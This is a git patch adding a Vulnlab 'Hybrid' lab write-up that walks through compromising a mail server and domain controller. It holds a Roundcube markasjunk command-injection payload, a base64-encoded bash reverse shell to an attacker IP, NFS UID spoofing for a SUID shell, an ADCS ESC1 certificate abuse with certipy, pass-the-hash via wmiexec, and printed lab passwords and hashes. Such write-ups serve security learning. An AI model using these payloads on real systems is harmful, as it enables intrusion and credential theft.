From 1fc8422ab0de674d9834904490cc80783135c448 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Wed, 12 Jul 2023 22:25:38 +0300
Subject: [PATCH] Create Hybrid.md
---
Vulnlab/Hybrid.md | 342 ++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 342 insertions(+)
create mode 100644 Vulnlab/Hybrid.md
diff --git a/Vulnlab/Hybrid.md b/Vulnlab/Hybrid.md
new file mode 100644
index 0000000..07889d6
--- /dev/null
+++ b/Vulnlab/Hybrid.md
@@ -0,0 +1,342 @@
+
+# Vulnlab - Hybrid
+
+# dc01
+
+## NMAP
+
+```bash
+Nmap scan report for 10.10.177.197
+Host is up (1.1s latency).
+Not shown: 65523 filtered tcp ports (no-response)
+PORT STATE SERVICE VERSION
+53/tcp open tcpwrapped
+135/tcp open tcpwrapped
+139/tcp open tcpwrapped
+445/tcp open tcpwrapped
+464/tcp open tcpwrapped
+3268/tcp open tcpwrapped
+3389/tcp open tcpwrapped
+|_ssl-date: 2023-07-09T15:21:51+00:00; -3s from scanner time.
+| ssl-cert: Subject: commonName=dc01.hybrid.vl
+| Issuer: commonName=dc01.hybrid.vl
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-06-17T08:29:18
+| Not valid after: 2023-12-17T08:29:18
+| MD5: 503e6a310914a23a96f899c161496768
+|_SHA-1: 8b350872418cb813302ad430acb1b1497acada2e
+49669/tcp open tcpwrapped
+51915/tcp open tcpwrapped
+51928/tcp open tcpwrapped
+53128/tcp open tcpwrapped
+57220/tcp open tcpwrapped
+Host script results:
+|_clock-skew: mean: -3s, deviation: 0s, median: -3s
+| smb2-time:
+| date: 2023-07-09T15:21:28
+|_ start_date: N/A
+| smb2-security-mode:
+| 311:
+|_ Message signing enabled and required
+
+```
+
+## PORT 445 (SMB)
+
+From dc01, we only see smb service running which we can try enumerating with anonymous login which didn't worked
+
+
+
+# mail01
+
+## NMAP
+
+```bash
+Nmap scan report for 10.10.177.198
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 256 60bc2226783cb4e06beaaa1ec1625dde (ECDSA)
+|_ 256 a3b5d86106e63a418845e35203d2231b (ED25519)
+25/tcp open smtp Postfix smtpd
+|_smtp-commands: Couldn't establish connection on port 25
+80/tcp open http nginx 1.18.0 (Ubuntu)
+|_http-server-header: nginx/1.18.0 (Ubuntu)
+110/tcp open pop3 Dovecot pop3d
+111/tcp open rpcbind
+143/tcp open imap Dovecot imapd (Ubuntu)
+587/tcp open smtp Postfix smtpd
+|_smtp-commands: Couldn't establish connection on port 587
+993/tcp open ssl/imap Dovecot imapd (Ubuntu)
+| ssl-cert: Subject: commonName=mail01
+| Subject Alternative Name: DNS:mail01
+| Issuer: commonName=mail01
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-06-17T13:20:17
+| Not valid after: 2033-06-14T13:20:17
+| MD5: 38372b812fb16f03436025b4d26bdb29
+|_SHA-1: 61c2400271ff7850e0da4a5ae256e7df666bb008
+995/tcp open ssl/pop3 Dovecot pop3d
+| ssl-cert: Subject: commonName=mail01
+| Subject Alternative Name: DNS:mail01
+| Issuer: commonName=mail01
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-06-17T13:20:17
+| Not valid after: 2033-06-14T13:20:17
+| MD5: 38372b812fb16f03436025b4d26bdb29
+|_SHA-1: 61c2400271ff7850e0da4a5ae256e7df666bb008
+2049/tcp open rpcbind
+33893/tcp open rpcbind
+37693/tcp open rpcbind
+42661/tcp open rpcbind
+46025/tcp open rpcbind
+47609/tcp open rpcbind
+```
+
+## PORT 80 (HTTP)
+
+mail01 had web server running on port 80 which redirects to `mail01.hybrid.vl`
+
+
+
+Adding the domain in `/etc/hosts` file
+
+
+
+
+
+This brings us to `Roudcube webmail` login portal, trying default credentials like `admin:admin` it didn't worked
+
+
+
+## PORT 2049 (NFS)
+
+mail01 had nfs running on port 2049, we can list the share available to mount
+
+```bash
+showmount -e 10.10.177.198
+```
+
+
+
+We can mount this share with the following command
+
+```bash
+ mount -t nfs 10.10.177.198:/opt/share /home/arz/VulnLab/Hybrid/share
+```
+
+
+
+From this directory we can find `backup.tar.gz`
+
+
+
+Extracting the archive
+
+
+
+From the `opt` folder we can find a certificate
+
+
+
+And from `/etc/dovecot` we can find the credentials for roundcube mail
+
+
+
+Logging in as `peter.turner` we can see an email sent from admin talking about spam filter
+
+
+
+https://ssd-disclosure.com/ssd-advisory-roundcube-markasjunk-rce/
+
+## Foothold
+
+Following an article for remote code execution on markasjunk plugin we can execute commands by changing the email address of a user by using `${IFS}` which is a variable in bash that represents a space, tab and a new line character
+
+```
+admin&curl${IFS}10.8.0.136&@hybrid.vl
+```
+
+
+
+Now mark any email as junk
+
+
+
+We'll get a callback on our listener, so the commands are getting executed
+
+
+
+We can get a reverse shell by base64 encoding the payload
+
+```bash
+bash -i >& /dev/tcp/10.8.0.136/2222 0>&1
+
+admin&echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMTM2LzIyMjIgMD4mMQo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl
+```
+
+
+
+On doing the same procedure, we'll get a reverse shell as `www-data`
+
+
+
+In `/home` we only see one user which is a domain user, `peter.turner`, I tried switching to peter by using his roudcube password but it didn't worked
+
+
+
+I tried cracking the password of `privkey.pem` but it took a long time so I decided to give up on that
+
+
+
+Reading `/etc/exports` file, we can see there's no `no_root_squash` so we cannot place bash binary owned by root user
+
+
+
+We know there's peter.turner on the victim machine with the id `902601108`
+
+
+
+Before creating the user with the same uid on our machine we meed to allow the creation of uids above 60000 range
+
+
+
+Edit the `/etc/logins.defs` and change the `UID_MAX` value
+
+
+
+
+
+Now copying bash binary in the mounted folder
+
+
+
+We can see that this binary is owned by peter.turner since we used the same UID and it's a SUID, but on executing it wasn't being executed due to a different GLIBC version, so instead transferring the bash binary from the victim machine and making it a SUID
+
+
+
+
+
+From peter's home directory, we can find `passwords.kdbx` file which is a keepassp password safe file
+
+
+
+
+Reading the kdbx file with `kpcli` , it asks for a password
+
+
+
+Using peter's roudcube password it worked on this file
+
+
+
+From `hybrid.vl` entry we can get the password of peter
+
+
+We can use this password to check privileges of peter, which can run anything as root
+
+
+
+
+
+Being root user we can access `/etc/k`
+
+Running `python-bloodhound` to enumerate the trusted.vl domain
+
+```bash
+python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'hybrid.vl' -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -gc 'dc01.hybrid.vl' -ns 10.10.132.229
+```
+
+
+
+From bloodhound, there wasn't any path from peter leading to domain admin
+
+
+
+Enumerating ADCS with `certipy` for vulnerable certificates
+
+```bash
+certipy find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.228.165
+```
+
+
+
+Members of `Authenticated users` can enroll and authenticate any user with `hybrid-DC01-CA` (ESC-1), using `old-bloodhound` to get the result in json file so we can view it in bloodhound
+
+```bash
+certipy find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.147.37 -old-bloodhound
+```
+
+
+
+https://raw.githubusercontent.com/ly4k/Certipy/main/customqueries.json
+
+ Make sure to add custom queries for ADCS in `~./config/bloodhound/customqueries.json` to analyze ADCS in the domain
+
+
+
+After putting the custom queries we can see the templates being reflected on bloodhound
+
+
+
+Marking `hybrid-DC01-CA` as the high value target and checking the shortest path to hybrid-DC01-CA
+
+
+
+So now we need MAIL01's hash, going back to linux machine as root user, we can extract the NTHash using https://github.com/sosdave/KeyTabExtract from `/etc/krb5.keytab`
+
+
+
+
+
+From certipy we didn't found any template names, from bloodhound we can see two templates from which using `HYBRIDCOMPUTERS`
+
+
+
+On requesting the certificate, it was giving an error related to public key requirement
+
+
+
+Checking the pem file we have, we can see the size of the public key, which is 4096 bit
+
+
+
+Specifying the size of the public key file and requesting the certificate to authenticate as administrator
+
+```bash
+certipy req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.228.165" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'dc01.hybrid.vl' -key-size 4096
+```
+
+
+
+Now again with `certipy` we can request administrator's NTHash
+
+```bash
+certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.228.165
+```
+
+
+
+We can get a shell through `wmiexec`
+
+```bash
+wmiexec.py administrator@10.10.228.165 -hashes ':60701e8543c9f6db1a2af3217386d3dc'
+```
+
+
+
+
+## References
+
+- https://ssd-disclosure.com/ssd-advisory-roundcube-markasjunk-rce/
+- https://github.com/ly4k/Certipy/blob/main/customqueries.json
+- https://github.com/sosdave/KeyTabExtract
+- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
+- https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration
+